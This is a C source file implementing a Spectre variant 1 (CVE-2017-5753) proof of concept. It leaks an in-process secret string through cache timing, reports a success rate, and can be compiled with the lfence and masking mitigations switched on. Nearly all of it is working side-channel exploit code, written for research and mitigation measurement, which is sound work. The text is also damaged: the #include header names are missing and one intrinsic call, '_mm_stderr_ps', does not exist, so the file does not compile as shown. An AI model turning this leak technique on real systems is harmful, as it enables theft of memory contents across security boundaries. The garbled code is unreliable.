/* spectre.c - CVE-2017-5753 user-to-user sucess rate measurement * * Borrows code from * - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6 * - https://github.com/genua/meltdown * * Copyright (c) 2022 Samuel AUBERTIN * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include #include #include #include #include #include /* for rdtscp and clflush */ #if defined(__i386__) || defined(__amd64__) #define CACHELINE_SIZE 64 #else #error "unsupported architecture" #endif #if defined(__SSE__) && !defined(__SSE2__) #define NOSSE2 #endif #ifdef NOSSE2 #define NORDTSCP #define NOMFENCE #define NOCLFLUSH #endif //NOSSE2 #ifndef NORDTSCP #define LATENCY 42 + 42 #else #ifndef NOMFENCE #define LATENCY 18 + 18 #endif #endif #ifdef MASKING_MITIGATION /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 * * array_index_mask_nospec() - generate a mask that is ~0UL when the * bounds check succeeds and 0 otherwise * @index: array element index * @size: number of elements in array * * Returns: * 0 - (index < size) */ static inline unsigned long array_index_mask_nospec( unsigned long index, unsigned long size ) { unsigned long mask; __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;" :"=r" (mask) :"g"(size),"r" (index) :"cc"); return mask; } #endif //MASKING_MITIGATION #ifdef NOCLFLUSH #define CACHE_FLUSH_ITERATIONS 2048 #define CACHE_FLUSH_STRIDE 4096 uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS]; /* Flush memory using long SSE instructions */ void flush_memory_sse( uint8_t * addr ) { float * p = (float *)addr; float c = 0.f; __m128 i = _mm_setr_ps(c, c, c, c); int k, l; /* Non-sequential memory addressing by looping through k by l */ for (k = 0; k < 4; k++) for (l = 0; l < 4; l++) _mm_stderr_ps(&p[(l * 4 + k) * 4], i); } #endif //NOCLFLUSH char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion."; unsigned int array1_size = 16; uint8_t unused1[64]; uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t unused2[64]; uint8_t array2[256 * 512]; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ unsigned cache_hit_threshold; static inline unsigned timed_access( volatile uint8_t *addr ) { uint64_t t0, t1; #pragma GCC diagnostic ignored "-Wuninitialized" unsigned int junk = junk; #ifndef NORDTSCP t0 = __rdtscp(& junk); junk |= *addr; t1 = __rdtscp(& junk); #else #ifndef NOMFENCE /* Since the rdstc instruction isn't serialized, newer processors will try to reorder it, ruining its value as a timing mechanism. To get around this, we use the mfence instruction to introduce a memory barrier and force serialization. mfence is used because it is portable across Intel and AMD. */ _mm_mfence(); t0 = __rdtsc(); _mm_mfence(); junk = * addr; _mm_mfence(); t1 = __rdtsc(); _mm_mfence(); #else /* The mfence instruction was introduced with the SSE2 instruction set, so we have to ifdef it out on pre-SSE2 processors. Luckily, these older processors don't seem to reorder the rdtsc instruction, so not having mfence on older processors is less of an issue. */ t0 = __rdtsc(); junk |= *addr; t1 = __rdtsc(); #endif // NOMFENCE #endif // NORDTSCP return (unsigned)(t1 - t0 - LATENCY); } static void calibrate_threshold( unsigned int *threshold ) { volatile char buf[2 * CACHELINE_SIZE]; volatile uint8_t *bufp; int i; const int cnt = 10000; uint64_t tcache = 0; __attribute__((unused)) volatile int junk = 0; bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1))); junk |= *bufp; for (i = 0, tcache = 0; i < cnt; i++) { tcache += timed_access(bufp); } tcache = tcache / cnt; if (threshold != NULL) { *threshold = tcache + LATENCY; } return; } void victim_function( size_t x ) { if (x < array1_size) { #ifdef LFENCE_MITIGATION /* * According to Intel et al, the best way to mitigate this is to * add a serializing instruction after the boundary check to force * the retirement of previous instructions before proceeding to * the read. * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf */ _mm_lfence(); #endif #ifdef MASKING_MITIGATION x &= array_index_mask_nospec(x, array1_size); #endif temp &= array2[array1[x] * 512]; } } void leak( size_t malicious_x, uint8_t value[2], int score[2], unsigned cache_hit_threshold ) { static int results[256]; int tries, i, j, mix_i; unsigned int junk = 0; size_t training_x, x; volatile uint8_t *addr; #ifdef NOCLFLUSH int junk2 = 0; int l; (void)junk2; #endif for (i = 0; i < 256; i++) { results[i] = 0; } for (tries = 999; tries > 0; tries--) { #ifndef NOCLFLUSH /* Flush array2[256*(0..255)] from cache */ for (i = 0; i < 256; i++) _mm_clflush(&array2[i * 512]); #else /* Flush array2[256*(0..255)] from cache using long SSE instruction several times */ for (j = 0; j < 16; j++) { for (i = 0; i < 256; i++) { flush_memory_sse( & array2[i * 512]); } } #endif /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */ training_x = tries % array1_size; for (j = 29; j >= 0; j--) { #ifndef NOCLFLUSH _mm_clflush(&array1_size); #else /* Alternative to using clflush to flush the CPU cache * Read addresses at 4096-byte intervals out of a large array. * Do this around 2000 times, or more depending on CPU cache size. */ for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) { junk2 = cache_flush_array[l]; } #endif for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */ /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ /* Avoid jumps in case those tip off the branch predictor */ x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */ x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */ x = training_x ^ (x & (malicious_x ^ training_x)); /* Call the victim! */ victim_function(x); } /* Time reads. Order is lightly mixed up to prevent stride prediction */ for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; addr = & array2[mix_i * 512]; if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) results[mix_i]++; /* cache hit - add +1 to score for this value */ } /* Locate highest results in j */ j = -1; for (i = 0; i < 256; i++) { if (j < 0 || results[i] >= results[j]) { j = i; } } if (results[j] >= 3) break; } results[0] ^= junk; /* use junk so code above won’t get optimized out*/ value[0] = (uint8_t) j; score[0] = results[j]; } int main( int argc, char** argv ) { int o; size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */ int i, score[2], len = (int)strlen(secret); uint8_t value[2]; unsigned successes = 0; int json = 0; while ((o = getopt(argc, argv, "t:j")) != EOF) { switch (o) { case 't': cache_hit_threshold = atoi(optarg); break; case 'j': json++; break; default: usage: fprintf(stderr, "usage: %s [-j] " "[-t threshold]\n" "\t-j\t\tJSON output\n" "\t-t INT\t\tfixed threshold\n", argv[0]); return 1; } } if (argc != optind) goto usage; fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ", argv[0] + 2, (int)strlen(secret)); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); #ifdef NOCLFLUSH for (i = 0; i < (int)sizeof(cache_flush_array); i++) { cache_flush_array[i] = 1; } #endif for (i = 0; i < (int)sizeof(array2); i++) array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ while (--len >= 0) { leak(malicious_x++, value, score, cache_hit_threshold); if(score[0] == 3 && value[0] > 31 && value[0] < 127) { successes++; fprintf(stderr, "\033[32m%c\033[0m", (value[0])); } else { fprintf(stderr, "\033[31m?\033[0m"); } } fprintf(stderr, "\n"); if (json) { printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); #ifndef NORDTSCP printf("\"rdtscp\": true, "); #else printf("\"rdtscp\": false, "); #endif #ifndef NOMFENCE printf("\"mfence\": true, "); #else printf("\"mfence\": false, "); #endif #ifndef NOCLFLUSH printf("\"clflush\": true "); #else printf("\"clflush\": false "); #endif printf("}, \"mitigations\": { "); #ifdef LFENCE_MITIGATION printf("\"lfence\": true, "); #else printf("\"lfence\": false, "); #endif #ifdef MASKING_MITIGATION printf("\"masking\": true "); #else printf("\"masking\": false "); #endif printf("}, "); printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret)); } fprintf(stderr, "[+] %-27s\t",argv[0] + 2); #ifndef NORDTSCP fprintf(stderr, "RDTSCP "); #else fprintf(stderr, "RDTSC "); #endif #ifndef NOMFENCE fprintf(stderr, "MFENCE "); #endif #ifndef NOCLFLUSH fprintf(stderr, "CLFLUSH "); #endif #ifdef LFENCE_MITIGATION fprintf(stderr, "LFENCE_MITIGATION "); #endif #ifdef MASKING_MITIGATION fprintf(stderr, "MASKING_MITIGATION "); #endif fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret)); return 0; }